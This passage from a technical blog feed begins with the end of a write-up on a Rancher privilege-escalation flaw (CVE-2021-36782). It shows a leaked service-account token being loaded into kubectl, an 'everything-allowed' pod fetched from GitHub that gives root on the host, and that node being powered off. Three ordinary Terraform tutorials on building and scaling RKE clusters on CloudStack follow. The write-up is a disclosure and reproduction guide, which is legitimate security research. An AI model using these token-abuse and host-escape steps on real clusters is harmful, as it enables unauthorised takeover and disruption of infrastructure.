token=eyJhbGciOiJSUzI1NiIsImtpZCI6IklvbXVOckJ1eFZrRVNZUDNXRnlndWNSbFpzRndIWjlKQnJkOFdDUG5ybFEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tcTY0eDUiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImNjM2QyNGVjLWI0MjItNGJmYy04M2U0LWE5ODJmOTRlYjJhOSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.ApVZZ9EEo7bqUeEpHdVqEklWL8GPN4fVfRwH0LtTm6lRsrQFnYVpus2VrjyeqoVTnrzEetsYZyWEiv0KODw3HYgePW_XbrrCqKSi3Aca6-sA5sJP28A4QWkUVH_6y-6nS53w24pdk77l-4YxXLIYTUilipe9JaXpzBrER5OsCNjweNILfmC5LHlRAtpvNVh7vahZsAxcDdDBzwpWuKubDz_3yRiHNH8nC-x40SJz90Xi771w7Aw7qvAvodX-5efVFHuzNw0Q4Qjcpj6RcV2I-rKGy5ORYgrXcNrXgPWZSpO8MU8iupS5XpW2SH9pgQI6Xe2QuyySia6I71ZkagsYWw

# Use a different kubeconfig file
export KUBECONFIG=~/kubeconfig-extra-cluster2

kubectl config set-cluster extra-cluster2 \
   --server=https://1...2:6443 \
   --insecure-skip-tls-verify=true

kubectl config set-credentials extra-cluster2-admin \
   --token=$token

kubectl config set-context extra-cluster2 \
   --user=extra-cluster2-admin \
   --cluster=extra-cluster2

kubectl config use-context extra-cluster2

kubectl auth can-i --list</code></pre><figcaption><p><span style="white-space: pre-wrap;">Configuring the kubectl config</span></p></figcaption></figure><p>Running the above commands shows the following output.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2022/11/image-5.png" class="kg-image" alt loading="lazy" width="888" height="366" srcset="https://fe.ax/content/images/size/w600/2022/11/image-5.png 600w, https://fe.ax/content/images/2022/11/image-5.png 888w"><figcaption><span style="white-space: pre-wrap;">kubectl auth can-i --list</span></figcaption></figure><p>Which essentially means unrestricted access. As an extra, let&apos;s gain access to the host and power it off, as we don&apos;t need this cluster anymore anyway.</p><figure class="kg-card kg-code-card"><pre><code class="language-plaintext">kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml

&gt; pod/everything-allowed-exec-pod created

kubectl exec -it everything-allowed-exec-pod -- chroot /host bash

&gt; root@marco-test-extra-node3:/# id
&gt; uid=0(root) gid=0(root) groups=0(root)
&gt; root@marco-test-extra-node3:/# poweroff

</code></pre><figcaption><p><span style="white-space: pre-wrap;">Powering off one of the nodes</span></p></figcaption></figure><figure class="kg-card kg-image-card"><img src="https://fe.ax/content/images/2022/11/image-6.png" class="kg-image" alt loading="lazy" width="725" height="252" srcset="https://fe.ax/content/images/size/w600/2022/11/image-6.png 600w, https://fe.ax/content/images/2022/11/image-6.png 725w" sizes="(min-width: 720px) 720px"></figure><h2 id="the-new-way">The new way</h2><p>It&apos;s clear this token shouldn&apos;t be exposed to regular users. That&apos;s why the status field <em>serviceAccountToken </em>is being replaced by the <em>serviceAccountTokenSecret </em>field. This way, a separate privilege is needed to access the secret, which the regular user doesn&apos;t have.</p><p>This change can be seen in the following commit.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/rancher/rancher/commit/05fab40d32dae197d112d54412464686d43a5fb1"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Migrate cluster service account tokens to secrets &#xB7; rancher/rancher@05fab40</div><div class="kg-bookmark-description">Complete container management platform. 
Contribute to rancher/rancher development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">rancher</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/d8a3b20435ea994f4fb710ad1a63d64f5c18435fa25fa514b2d1f9ac3211f93c/rancher/rancher/commit/05fab40d32dae197d112d54412464686d43a5fb1" alt></div></a></figure><p>If we upgrade Rancher to 2.6.7, we&apos;ll see the token&apos;s value disappear, and a new field will appear.</p><h2 id="reproducing-the-issue">Reproducing the issue</h2><p>Reading can be boring, so I wrote the post keeping in mind you want to follow along. This is a very easy exploit and, therefore, easily reproduced. I provide a Terraform module to set up a vulnerable Rancher cluster quickly. You can <a href="https://github.com/fe-ax/tf-cve-2021-36782">find it here</a>. It works on DigitalOcean, and the only thing you should need to fill in is your API key.</p><p>To reproduce the issue, let&apos;s spin up a new Kubernetes cluster and Rancher instance running version 2.6.6. Clone the above git repository to your local Linux machine and make sure you&apos;ve got Terraform installed. I&apos;ve used versions 1.1.6 and 1.3.5, so the exact version shouldn&apos;t matter.</p><h2 id="conclusion">Conclusion</h2><p>This vulnerability has two sides. On the one hand, you still need to gain access to Rancher. On the other hand, it certainly doesn&apos;t help with the insider threat when privileges are this easily escalated.</p><p>In projects as big as Rancher, one change can potentially open doors that weren&apos;t supposed to be opened. This door can stay open for a very long time until someone notices it.</p><p>This was a great experience, from discovery to exploitation. 
I understand the gravity of the issue, but it was thrilling.</p><p>Thanks to Rancher for the great open-source tool, Guilherme from Rancher for the quick response to the issue and for keeping me updated, and my colleague Mike for checking and confirming the discovery and figuring out a way to bypass the firewall using the UI shell.</p>]]></content:encoded></item><item><title><![CDATA[From Terraform monolith to modules]]></title><description><![CDATA[Moving config from a large monolith config to multiple modules. I'm looking into taking control of the run order and the errors I ran into.]]></description><link>https://fe.ax/terraform-monolith-to-modules/</link><guid isPermaLink="false">62aa367b094121017a6b401e</guid><category><![CDATA[Terraform]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 13 Apr 2022 21:08:03 GMT</pubDate><content:encoded><![CDATA[<p>In the last two posts, I&apos;ve explored Terraform and its terraforming capabilities in enabling quick, repeatable environments in the cloud. This time I want to take the three previous subdirectories and put an overarching Terraform configuration on top, which will use the other directories as modules. This should make it easier to manage their dependencies on each other.</p><p>Let&apos;s first start by getting a main.tf that tries to run them from the parent directory.</p><figure class="kg-card kg-code-card"><pre><code class="language-HCL">module &quot;nodes&quot; {
  source = &quot;./nodes&quot;
}

module &quot;rke&quot; {
  source = &quot;./rke&quot;
}

module &quot;rancher&quot; {
  source = &quot;./rancher&quot;
}</code></pre><figcaption>The overarching main Terraform configuration</figcaption></figure><p>Just run <code>terraform init</code> and <code>terraform plan</code> and you&apos;ll notice it won&apos;t work immediately.</p><figure class="kg-card kg-code-card"><pre><code>Error: Unable to find remote state
 
   with module.rke.data.terraform_remote_state.nodes,
   on rke/main.tf line 19, in data &quot;terraform_remote_state&quot; &quot;nodes&quot;:
   19: data &quot;terraform_remote_state&quot; &quot;nodes&quot; {
 
 No stored state was found for the given workspace in the given backend.
</code></pre><figcaption>Error because of missing dependencies</figcaption></figure><p>We first need the cloud machines to run and generate the relevant configs before we can plan further. In this case, we&apos;re hitting a dependency order problem.</p><p>First, let&apos;s clean things up in the subdirectories. I just removed all Terraform-generated files like this:</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">rm -rf terraform.tfstate* .terraform*
 
# only for RKE
rm -rf kubeconfig.yaml rke_debug.log </code></pre><figcaption>Remove unnecessary files</figcaption></figure><p>Be sure that you&apos;ve deleted all infrastructure. It&apos;s easier when you&apos;ve created a separate account.</p><p>Next, I&apos;ve added the <code>depends_on</code> argument, and this resulted in another error:</p><figure class="kg-card kg-code-card"><pre><code> Error: Module module.rancher contains provider configuration
 
 Providers cannot be configured within modules using count, for_each or depends_on.


 Error: Module module.rke contains provider configuration
 
 Providers cannot be configured within modules using count, for_each or depends_on.</code></pre><figcaption>Error after depends_on</figcaption></figure><p>It wasn&apos;t a good idea to have the providers defined in the modules anyway. Let&apos;s rip them out and give them a nice place of their own.</p><p>I moved all provider configs into their own file, which caused several issues; I&apos;ll walk through them below.</p><p>If you get the following error:</p><pre><code>Error: Failed to query available provider packages

Could not retrieve the list of available versions for provider hashicorp/rke: provider registry registry.terraform.io does not have a provider named registry.terraform.io/hashicorp/rke

Did you intend to use rancher/rke? If so, you must specify that source address in each module which requires that provider. To see which modules are currently depending on hashicorp/rke, run the following
command:
    terraform providers</code></pre><p>You should add the <code>required_providers</code> to the modules themselves too. Just don&apos;t add the <code>provider</code> block.</p><p>The first plan immediately showed the following issue:</p><pre><code>Error: Provider configuration not present

To work with module.rancher.rancher2_bootstrap.admin its original provider configuration at module.rancher.provider[&quot;registry.terraform.io/rancher/rancher2&quot;].bootstrap is required, but it has been removed.

This occurs when a provider configuration is removed while objects created by that provider still exist in the state. Re-add the provider configuration to destroy module.rancher.rancher2_bootstrap.admin,
after which you can remove the provider configuration again.</code></pre><p>To fix this, make the module block of Rancher look like this:</p><pre><code class="language-hcl">module &quot;rancher&quot; {
  source = &quot;./modules/rancher&quot;
  depends_on = [
    module.rke
  ]
  providers = {
    rancher2.bootstrap = rancher2.bootstrap
    rancher2.admin     = rancher2.admin
  }
}</code></pre><p>And in the Rancher main.tf:</p><pre><code class="language-hcl">terraform {
  required_providers {
    local = {
      source  = &quot;hashicorp/local&quot;
      version = &quot;2.2.2&quot;
    }
    rancher2 = {
      source  = &quot;rancher/rancher2&quot;
      version = &quot;1.22.2&quot;
      configuration_aliases = [ rancher2.bootstrap, rancher2.admin ]
    }
    helm = {
      source  = &quot;hashicorp/helm&quot;
      version = &quot;2.4.1&quot;
    }
  }
}</code></pre><p>Now let&apos;s run <code>terraform apply</code> for the fourth time and keep my fingers crossed.</p><p>It didn&apos;t work, and the RKE module stopped when it couldn&apos;t read the remote state of &quot;cloud&quot;, which shouldn&apos;t be needed anymore.</p><p>The error:</p><pre><code>No stored state was found for the given workspace in the given backend.</code></pre><p>I&apos;ve changed the following lines:</p><pre><code># In file rke.tf
 - for_each = data.terraform_remote_state.cloud.outputs.ip_address
 + for_each = var.rke_cluster_ips
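
# (Assumed, not shown in this post) the rke module must also declare the
# new input variable, e.g. in modules/rke/variables.tf:
variable &quot;rke_cluster_ips&quot; {
  type = list(string)
}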

# RKE module in file 00-main.tf
module &quot;rke&quot; {
  source = &quot;./modules/rke&quot;
  depends_on = [
    module.cloud
  ]

  rke_cluster_ips = module.cloud.ip_address
}</code></pre><p>Running apply again gave me some more relative directory issues, which were easily fixed by adding <code>${path.module}/</code> or just removing the <code>../</code></p><p>The final directory structure is this:</p><pre><code>.
&#x251C;&#x2500;&#x2500; modules
&#x2502;   &#x251C;&#x2500;&#x2500; cloud
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; local_instances.tf
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; provision-docker.sh
&#x2502;   &#x2502;   &#x2514;&#x2500;&#x2500; security_groups.tf
&#x2502;   &#x251C;&#x2500;&#x2500; rancher
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; certmanager.tf
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x2502;   &#x2514;&#x2500;&#x2500; rancher.tf
&#x2502;   &#x2514;&#x2500;&#x2500; rke
&#x2502;       &#x251C;&#x2500;&#x2500; main.tf
&#x2502;       &#x2514;&#x2500;&#x2500; rke.tf
&#x251C;&#x2500;&#x2500; 00-main.tf
&#x251C;&#x2500;&#x2500; 01-cloud.tf
&#x251C;&#x2500;&#x2500; 02-rke.tf
&#x251C;&#x2500;&#x2500; 03-rancher-bootstrap.tf
&#x251C;&#x2500;&#x2500; rke_debug.log
&#x251C;&#x2500;&#x2500; terraform.tfstate
&#x251C;&#x2500;&#x2500; terraform.tfstate.backup
&#x251C;&#x2500;&#x2500; test_rsa
&#x2514;&#x2500;&#x2500; test_rsa.pub

4 directories, 18 files</code></pre><h2 id="conclusion">Conclusion</h2><p>With <code>terraform apply</code> running, we&apos;ve squashed three runs into one single run. We can hit deploy and get something to drink, pet the cat, and return to an entirely freshly provisioned environment.</p><p></p>]]></content:encoded></item><item><title><![CDATA[Efficiently scaling RKE with Terraform]]></title><description><![CDATA[Efficiently scaling RKE using Terraform by using dynamic block and count for loops.]]></description><link>https://fe.ax/efficiently-scaling-rke-with-terraform/</link><guid isPermaLink="false">62aa367b094121017a6b401c</guid><category><![CDATA[Terraform]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sat, 26 Mar 2022 15:20:26 GMT</pubDate><content:encoded><![CDATA[<p>We&apos;ve set up a quick start setup with one of everything in the previous blog post. One of everything is excellent for a quick test or check, but you might want to up those rookie numbers. In this blog post, we&apos;ll make it scale very easily.</p><p>If you haven&apos;t destroyed your previous setup, you should. Create a new clean account if you can&apos;t or don&apos;t want to. It&apos;s essential to have your infrastructure set up reproducible at every change from the ground up, and that&apos;s why we start from the beginning.</p><h2 id="creating-multiple-instances">Creating multiple instances</h2><p>First, let&apos;s move the instance definition to its own file called <code>local_instances.tf</code>. I&apos;ve also changed the resource name to &quot;local&quot;.</p><p>Now let&apos;s scale this instance up to two. We start with two and will scale up to three at the end to see what happens while it&apos;s in production. To scale it up easily, we need to add &#xA0;<code>count = 2</code> to the instance configuration. 
However, more changes are required in the other parts of the Terraform config to make it work with the scaled instance.</p><p>After adding <code>count = 2</code> to the instance config, I&apos;ve also changed the <code>name = &quot;test&quot;</code> to <code>name = &quot;local-node${count.index + 1}&quot;</code> to reflect the name of the node in the CloudStack UI.</p><p>The complete <code>local_instances.tf</code> file now looks like this:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_instance&quot; &quot;local_nodes&quot; {
  count              = 2
  name               = &quot;local-node${count.index + 1}&quot;
  service_offering   = &quot;VM 4G/4C&quot;
  network_id         = &quot;g56cf51f-93ab-2351-a222-9c9525dc8533&quot;
  template           = &quot;Ubuntu 20.04&quot;
  zone               = &quot;zone.ams.net&quot;
  keypair            = cloudstack_ssh_keypair.testkey.id
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
  root_disk_size     = 20

  connection {
    type        = &quot;ssh&quot;
    user        = &quot;root&quot;
    private_key = file(&quot;../test_rsa&quot;)
    host        = self.ip_address
  }
  
  provisioner &quot;remote-exec&quot; {
    inline  = [&quot;curl https://releases.rancher.com/install-docker/20.10.sh | sh&quot;]
  }
}</code></pre><figcaption>New local_instances.tf file</figcaption></figure><p>Now is the time to set up the DNS of the domain you&apos;ll use for Rancher.</p><h2 id="dynamic-rke-nodes">Dynamic RKE nodes</h2><p>To let RKE know it needs to install multiple nodes instead of one, we need to expose all the node IP addresses. To automate this, we&apos;ll use a wildcard (splat) expression.</p><p>The output block is now changed to the following:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">output &quot;ip_address&quot; {
  value = cloudstack_instance.local_nodes[*].ip_address
}</code></pre><figcaption>Output data</figcaption></figure><p>Now let&apos;s apply this config first. Terraform would remove the old node if you didn&apos;t remove it already. Terraform will create two new nodes.</p><p>To change RKE to dynamically add the nodes based on the output data of Cloud, we need to add a <a href="https://www.terraform.io/language/expressions/dynamic-blocks">dynamic block</a>.</p><pre><code class="language-hcl">resource &quot;rke_cluster&quot; &quot;cluster_local&quot; {
  dynamic &quot;nodes&quot; {
    for_each = data.terraform_remote_state.cloud.outputs.ip_address
    content {
      address = nodes.value
      user    = &quot;root&quot;
      role    = [&quot;controlplane&quot;, &quot;worker&quot;, &quot;etcd&quot;]
      ssh_key = file(&quot;../test_rsa&quot;)
    }
  }
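
  # (Equivalent sketch) The same dynamic block with an explicit iterator
  # name, so content refers to &quot;node&quot; instead of the block label:
  # dynamic &quot;nodes&quot; {
  #   for_each = data.terraform_remote_state.cloud.outputs.ip_address
  #   iterator = node
  #   content {
  #     address = node.value
  #     user    = &quot;root&quot;
  #     role    = [&quot;controlplane&quot;, &quot;worker&quot;, &quot;etcd&quot;]
  #     ssh_key = file(&quot;../test_rsa&quot;)
  #   }
  # }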
}</code></pre><p>The word &quot;nodes&quot; on the second line sets both the name of the generated block and the iterator name. The naming can be confusing, but the dynamic block&apos;s label must match the name of the block you want to generate. You can change the iterator name by adding <code>iterator = anothername</code> (an identifier, not a quoted string) before <code>content</code>.</p><p>Before you run <code>terraform plan</code>, be sure to delete the <code>terraform.tfstate</code> file to start over. The removal is necessary because the old RKE cluster doesn&apos;t exist anymore. You can also remove it with <code>terraform state rm</code>.</p><p>When you run <code>terraform plan</code> you&apos;ll see it dynamically created the <code>nodes</code> blocks.</p><pre><code class="language-hcl">      + nodes {
          + address        = &quot;1.2.3.4&quot;
          + role           = [
              + &quot;controlplane&quot;,
              + &quot;worker&quot;,
              + &quot;etcd&quot;,
            ]
          + ssh_agent_auth = (known after apply)
          + ssh_key        = (sensitive value)
          + user           = (sensitive value)
        }
      + nodes {
          + address        = &quot;1.2.3.5&quot;
          + role           = [
              + &quot;controlplane&quot;,
              + &quot;worker&quot;,
              + &quot;etcd&quot;,
            ]
          + ssh_agent_auth = (known after apply)
          + ssh_key        = (sensitive value)
          + user           = (sensitive value)
        }
    }</code></pre><p>Before we apply this config, we need to open up the firewall between the nodes.</p><h2 id="security-groups">Security groups</h2><p>To allow communication between the RKE nodes, we need to open the firewall both between the nodes themselves and to the outside world. I&apos;ve created the following security group rules based on this <a href="https://rancher.com/docs/rke/latest/en/os/#ports">page from Rancher</a>.</p><pre><code class="language-hcl">resource &quot;cloudstack_security_group_rule&quot; &quot;Default-SG-RKEs-Ruleset&quot; {
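  # The for expression below turns every node IP into a /32 CIDR, for
  # example [&quot;1.2.3.4&quot;, &quot;1.2.3.5&quot;] becomes [&quot;1.2.3.4/32&quot;, &quot;1.2.3.5/32&quot;],
  # so the ruleset automatically follows however many instances count creates.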
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [for s in cloudstack_instance.local_nodes : format(&quot;%s/32&quot;, s.ip_address)]
    protocol  = &quot;tcp&quot;
    ports     = [&quot;2379&quot;, &quot;2380&quot;, &quot;10250&quot;, &quot;6443&quot;]
  }

  rule {
    cidr_list = [for s in cloudstack_instance.local_nodes : format(&quot;%s/32&quot;, s.ip_address)]
    protocol  = &quot;udp&quot;
    ports     = [&quot;8472&quot;]
  }
}</code></pre><p>I&apos;ve also added <code>30000-32767</code> to <code>Default-SG-Home-Ruleset</code>.</p><p>Let&apos;s apply the cloud configuration now. This will only create the new security_group_rule.</p><h2 id="scaling-rke">Scaling RKE</h2><p>Now that the firewall is set up, you can run <code>terraform apply</code>. Once the two-node RKE cluster is up, check whether it functions correctly using the created <code>kubeconfig.yaml</code> file.</p><pre><code class="language-shell-session">marco@DESKTOP-WS:~/terra/rke$ export KUBECONFIG=&quot;./kubeconfig.yaml&quot;
marco@DESKTOP-WS:~/terra/rke$ kubectl get nodes
NAME            STATUS   ROLES                      AGE   VERSION
1.2.3.4         Ready    controlplane,etcd,worker   46m   v1.21.7
1.2.3.5         Ready    controlplane,etcd,worker   46m   v1.21.7</code></pre><p>Now let&apos;s check if everything will work as expected when we bump the <code>count = 2</code> to <code>count = 3</code>! First, move back to the Cloud config. Then up the count and run apply again.</p><pre><code class="language-hcl">Plan: 1 to add, 1 to change, 0 to destroy.

Changes to Outputs:
  ~ ip_address = [
        # (1 unchanged element hidden)
        &quot;1.2.3.5&quot;,
      + (known after apply),
    ]</code></pre><p>It seems like one extra instance is created. We also see that Terraform recreated the security rule, which could become an issue in high-traffic production usage. A dynamic block configuration might fix this.</p><p>Perform the apply command. Watch the extra node, node3, be created and move to the RKE directory.</p><p>Applying the RKE config looks slightly off, and I think this is caused by the changing order of IP addresses that come from Cloud&apos;s output. We could change this into a mapped value, which could also come in handy to set the node_name, which is missing.</p><p>After 3 minutes and 35 seconds, the cluster is expanded. Let&apos;s check the node ages.</p><pre><code class="language-shell-session">local_sensitive_file.kube_config_yaml: Creating...
local_sensitive_file.kube_config_yaml: Creation complete after 0s [id=f5e0de88e06ce7c347247247f69d69a1268830732]

Apply complete! Resources: 1 added, 1 changed, 1 destroyed.
marco@DESKTOP-WS:~/tests/rke$ kubectl get nodes
NAME            STATUS   ROLES                      AGE    VERSION
1.2.3.4         Ready    controlplane,etcd,worker   60m    v1.21.7
1.2.3.5         Ready    controlplane,etcd,worker   60m    v1.21.7
1.2.3.6         Ready    controlplane,etcd,worker   103s   v1.21.7
marco@DESKTOP-WS:~/tests/rke$ kubectl get pods -n ingress-nginx
NAME                             READY   STATUS    RESTARTS   AGE
nginx-ingress-controller-88pf4   1/1     Running   0          62m
nginx-ingress-controller-h2glc   1/1     Running   0          4m35s
nginx-ingress-controller-srkwg   1/1     Running   0          62m</code></pre><h2 id="conclusion">Conclusion</h2><p>The cluster is efficiently scaled up without downtime for the running pods. I would implement a couple more changes to the configuration before taking this to a production level. For example, you could:</p><ul><li>Move it to modules and include these three directories from there</li><li>Store your state files in an S3 bucket</li><li>Move variables to a separate tfvars file, making the config setup-agnostic</li><li>Map the IP addresses to their corresponding node names</li></ul>]]></content:encoded></item><item><title><![CDATA[Rancher with Terraform on CloudStack]]></title><description><![CDATA[Setting up a Rancher environment running on RKE using Terraform. In this blog post, we'll build the Terraform config from scratch.]]></description><link>https://fe.ax/rancher-with-terraform-on-cloudstack/</link><guid isPermaLink="false">62aa367b094121017a6b401b</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 23 Mar 2022 22:15:22 GMT</pubDate><content:encoded><![CDATA[<p>I want to automate everything I can. Terraform is one of the automation tools I&apos;ve checked out in the past but not thoroughly explored yet. After playing with AWS and Terraform for a while, I became worried I&apos;d let some resources run wild, and they&apos;d start billing my credit card like crazy. I got access to a CloudStack environment, which is fantastic, and decided to build a Rancher cluster against it with Terraform. I&apos;m going to document my journey here in one or multiple posts.</p><p>Terraform is interesting. It allows you to create infrastructures from scratch while also removing every trace of its existence in seconds. 
Creating and destroying enables the flexibility to spin up a cluster when needed and break it down when finished.</p><p>This blog post will use Terraform to set up a Rancher server running on RKE, which we deploy on CloudStack.</p><p><em>And we&apos;re going to avoid having to do even a single task manually.</em></p><h2 id="creating-the-first-vm">Creating the first VM</h2><p>First things first, I needed a VM on CloudStack. After setting up API keys in my account and writing down the Terraform <a href="https://registry.terraform.io/providers/cloudstack/cloudstack/latest/docs">CloudStack provider&apos;s</a> bare minimum, I added the first <a href="https://registry.terraform.io/providers/cloudstack/cloudstack/latest/docs/resources/instance">CloudStack instance</a> resource.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  required_providers {
    cloudstack = {
      source = &quot;cloudstack/cloudstack&quot;
      version = &quot;0.4.0&quot;
    }
  }
}

provider &quot;cloudstack&quot; {
  api_url    = &quot;https://cloud.url/zone/api&quot;
  api_key    = &quot;api_key&quot;
  secret_key = &quot;secret_key&quot;
}
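
# (Optional sketch) Instead of hardcoding the two keys above, you can
# declare them as sensitive input variables and pass them in at apply time.
# The variable names here are illustrative, not from the original post:
# variable &quot;api_key&quot;    { sensitive = true }
# variable &quot;api_secret&quot; { sensitive = true }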

resource &quot;cloudstack_instance&quot; &quot;local_nodes&quot; {
  name             = &quot;local-node&quot;
  service_offering = &quot;VM 4G/4C&quot;
  network_id       = &quot;g56cf51f-93ab-2351-a222-9c9525dc8533&quot;
  template         = &quot;Ubuntu 20.04&quot;
  zone             = &quot;zone.ams.net&quot;
  root_disk_size   = 20 # You&apos;ll need at least 10GB of space
  expunge          = true # This removes the VM completely after destroy
}</code></pre><figcaption>The Terraform configuration</figcaption></figure><p>To initialize Terraform and let it download the binaries for the requested providers, we run <code>terraform init</code>. All that&apos;s left to do to see something running is <code>terraform apply</code>.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
  + create

Terraform will perform the following actions:

  # cloudstack_instance.test will be created
  + resource &quot;cloudstack_instance&quot; &quot;test&quot; {
      + display_name     = (known after apply)
      + expunge          = true
      + group            = (known after apply)
      + id               = (known after apply)
      + ip_address       = (known after apply)
      + name             = &quot;test&quot;
      + network_id       = &quot;g56cf51f-93ab-2351-a222-9c9525dc8533&quot;
      + project          = (known after apply)
      + root_disk_size   = 20
      + service_offering = &quot;VM 4G/4C&quot;
      + start_vm         = true
      + tags             = (known after apply)
      + template         = &quot;Ubuntu 20.04&quot;
      + zone             = &quot;zone.ams.net&quot;
    }

Plan: 1 to add, 0 to change, 0 to destroy.

Do you want to perform these actions?
  Terraform will perform the actions described above.
  Only &apos;yes&apos; will be accepted to approve.

  Enter a value: yes

cloudstack_instance.test: Creating...
cloudstack_instance.test: Still creating... [10s elapsed]
cloudstack_instance.test: Creation complete after 10s [id=9c9525dc8533-2592-450d-a774-g56cf51f]</code></pre><figcaption>Terraform apply result</figcaption></figure><p>Cool! The first machine is running, as can be seen in the UI. You can find the IP address there, or by running <code>terraform show</code>. You&apos;ll likely get no response when you ping this machine, because the firewall still denies all traffic.</p><h2 id="setting-up-the-security-groups">Setting up the security groups</h2><p>To be able to access the machine, you&apos;ll have to add rules to the default security group. You can read more about them <a href="http://docs.cloudstack.apache.org/en/latest/adminguide/networking/security_groups.html">here</a>. Adding rules can be done manually, but so could everything else, so we&apos;re using Terraform.</p><p>I&apos;ve added the following <a href="https://registry.terraform.io/providers/cloudstack/cloudstack/latest/docs/resources/security_group">security group</a> and two <a href="https://registry.terraform.io/providers/cloudstack/cloudstack/latest/docs/resources/security_group_rule">security group rules</a> in a new file called <code>security_groups.tf</code>. Terraform reads all <code>*.tf</code> files in the directory, so we don&apos;t have to worry about including them in <code>main.tf</code>. With these rules, the whole world can ping the machine, but only we can reach SSH.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_security_group&quot; &quot;Default-SG&quot; {
  name        = &quot;Default-SG&quot;
  description = &quot;Test SG for terraform tests&quot;
}

resource &quot;cloudstack_security_group_rule&quot; &quot;Default-SG-ICMP-Ruleset&quot; {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [&quot;0.0.0.0/0&quot;]
    protocol  = &quot;icmp&quot;
    icmp_code = -1
    icmp_type = -1
  }
}

resource &quot;cloudstack_security_group_rule&quot; &quot;Default-SG-Home-SSH-Ruleset&quot; {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [&quot;1.2.3.4/32&quot;] # Your IP address
    protocol  = &quot;tcp&quot;
    ports     = [&quot;22&quot;]
  }
}</code></pre><figcaption>The security groups</figcaption></figure><p>When Terraform creates a resource, it exports attributes about it, like the ID of the security group. We can use the ID exported by the <em>security group resource</em> to refer to it from the <em>security group rule</em>. This way, CloudStack knows which security group a ruleset belongs to.</p><p>Don&apos;t worry about the order of creation. Terraform infers dependencies from these references and creates the required resources first.</p><p>To make the machine use this security group, we must add it to the instance definition.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_instance&quot; &quot;test&quot; {
...
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
  
  connection {
    type        = &quot;ssh&quot;
...
  }</code></pre><figcaption>Adding the security_group_ids</figcaption></figure><p>Note that changing the security group of an instance results in replacing the machine.</p><blockquote>Once a VM is assigned to a security group, it remains in that group for its entire lifetime; you can not move a running VM from one security group to another.</blockquote><p>Which I find annoying.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">Terraform will perform the following actions:

  # cloudstack_instance.test must be replaced
-/+ resource &quot;cloudstack_instance&quot; &quot;test&quot; {
      ~ display_name       = &quot;test&quot; -&gt; (known after apply)
      + group              = (known after apply)
      ~ id                 = &quot;9c9525dc8533-2592-450d-a774-g56cf51f&quot; -&gt; (known after apply)
      ~ ip_address         = &quot;5.6.7.8&quot; -&gt; (known after apply)
        name               = &quot;test&quot;
      + project            = (known after apply)
      ~ root_disk_size     = 8 -&gt; (known after apply)
      + security_group_ids = [
          + &quot;ef6c8192-2795-440c-8774-1be8a969afd1&quot;,
        ] # forces replacement
      ~ tags               = {} -&gt; (known after apply)
        # (7 unchanged attributes hidden)
    }

Plan: 1 to add, 0 to change, 1 to destroy.</code></pre><figcaption>Terraform apply</figcaption></figure><p>Applying the new configuration sets up a new machine with the changed security group ID. We can ping it and reach the SSH port, but we cannot yet log in.</p><h2 id="adding-keys-to-access-the-machine">Adding keys to access the machine</h2><p>To gain SSH access to the server we just created, we have to give CloudStack a keypair to include when bootstrapping the machine.</p><p>I&apos;ve created an RSA key pair using <code>ssh-keygen -t rsa</code> and added the following to the <code>main.tf</code>. You can also use <code>~/.ssh/id_rsa.pub</code>, of course.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_instance&quot; &quot;test&quot; {
...
  zone               = &quot;zone.ams.net&quot;
  keypair            = cloudstack_ssh_keypair.testkey.id # This line
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
...
}

resource &quot;cloudstack_ssh_keypair&quot; &quot;testkey&quot; {
  name       = &quot;testkey&quot;
  public_key = &quot;${file(&quot;test_rsa.pub&quot;)}&quot;
